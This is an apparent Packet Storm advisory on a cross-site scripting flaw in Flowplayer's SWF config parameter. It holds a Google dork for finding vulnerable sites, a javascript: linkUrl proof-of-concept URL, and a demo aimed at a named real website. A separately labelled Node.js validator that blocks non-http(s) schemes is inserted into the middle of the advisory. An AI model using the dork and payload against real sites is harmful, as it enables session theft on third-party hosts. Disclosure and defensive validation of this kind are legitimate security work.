Flowplayer Cross Site Scripting

2014-05-16T00:00:00
ID PACKETSTORM:126646
Type packetstorm
Reporter Muhammad Adeel
Modified 2014-05-16T00:00:00

Description

                                        
                                            `# Flowplayer (js & swf) XSS Vulnerability  
# Date: 15/5/14  
# Vulnerability Risk: High
# Vulnerable Software: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf  
# Author: Muhammad Adeel aka Innoxent Stoker  
# Founder | Urdusecurity.blogspot.com  
  
# Vulnerability  
  
XSS (Cross Site Scripting) is a vulnerability in which attacker-controlled script is reflected by
the web server or delivered to clients and executed in their browsers. It is rated high risk
because it can lead to theft of session data and other client-side compromise.
  
# POC & Exploit  
  
The XSS is in the `config` parameter of flowplayer.swf: the JSON it accepts includes a
"linkUrl" value that the player uses as a link target without restricting the URL scheme,
so a javascript: URL supplied there is executed in the context of the hosting site.
  
  
http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4","linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf
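As an added defensive example (not code from the Flowplayer project or from this advisory), the Node.js validator below parses the `config` parameter before it reaches the player and rejects any clip `url` or `linkUrl` whose scheme is not http(s), including case and tab/newline variants of `javascript:`. The `playlist` key is assumed here to be Flowplayer's array form of the same clip objects; the advisory only shows the single `clip` form.

```javascript
// Added defensive example, not Flowplayer's own code. Validates the JSON passed in
// flowplayer.swf's `config` query parameter and rejects clip `url` / `linkUrl`
// values whose scheme is not http(s), so javascript:/data:/vbscript: never get through.

const SAFE_SCHEMES = new Set(['http:', 'https:']);

// Extract the scheme the way a browser would see it: drop leading control/space
// characters and any tab/CR/LF, then compare lowercase. null means no scheme (relative).
function schemeOf(value) {
  const cleaned = String(value)
    .replace(/^[\x00-\x20]+/, '')
    .replace(/[\t\r\n]/g, '');
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() + ':' : null;
}

function isSafeUrl(value) {
  const scheme = schemeOf(value);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// rawConfig is the percent-encoded (or plain) value of the `config` parameter.
// Returns { ok: true } or { ok: false, reason }.
function validateFlowplayerConfig(rawConfig) {
  let cfg;
  try {
    cfg = JSON.parse(decodeURIComponent(rawConfig));
  } catch (err) {
    return { ok: false, reason: 'config is not valid JSON/URL encoding: ' + err.message };
  }
  // `clip` is the single-clip form from the advisory; `playlist` is assumed to be
  // Flowplayer's array form, whose entries may be clip objects or bare URL strings.
  const clips = [].concat(cfg.clip || [], cfg.playlist || []);
  for (const clip of clips) {
    const entry = typeof clip === 'string' ? { url: clip } : clip;
    if (!entry || typeof entry !== 'object') continue;
    for (const key of ['url', 'linkUrl']) {
      if (key in entry && !isSafeUrl(entry[key])) {
        return { ok: false, reason: `${key} uses disallowed scheme ${schemeOf(entry[key])}` };
      }
    }
  }
  return { ok: true };
}

// The advisory's PoC config (decoded form) must be rejected.
const POC = '{"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",'
  + '"linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}';
console.log(validateFlowplayerConfig(POC));
```

Apply the same check in a reverse proxy or in the page that builds the embed; decoding assumes percent-encoding only, so run `+`-encoded query strings through your framework's query parser first.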
  
  
# Demo  
  
http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={  
"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",  
"linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80,  
111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101,  
101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32,  
83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101,  
99));"}}&.swf  
  
  